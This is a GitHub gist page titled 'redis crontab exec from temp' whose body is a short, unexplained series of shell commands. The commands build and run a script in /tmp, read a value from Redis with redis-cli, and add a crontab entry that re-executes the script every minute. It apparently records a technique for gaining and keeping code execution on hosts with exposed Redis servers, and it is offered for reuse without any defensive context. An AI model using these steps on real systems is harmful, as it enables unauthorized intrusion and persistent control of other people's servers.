Skip to content

Instantly share code, notes, and snippets.

@carnal0wnage
Last active January 18, 2017 02:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save carnal0wnage/b5e8ae7a489207c58f54cfaa7b37718d to your computer and use it in GitHub Desktop.
Save carnal0wnage/b5e8ae7a489207c58f54cfaa7b37718d to your computer and use it in GitHub Desktop.
redis crontab exec from temp
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
* * * * * sleep 10;/bin/sh /tmp/zz
from https://phpinfo.me/2016/07/07/1275.html
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment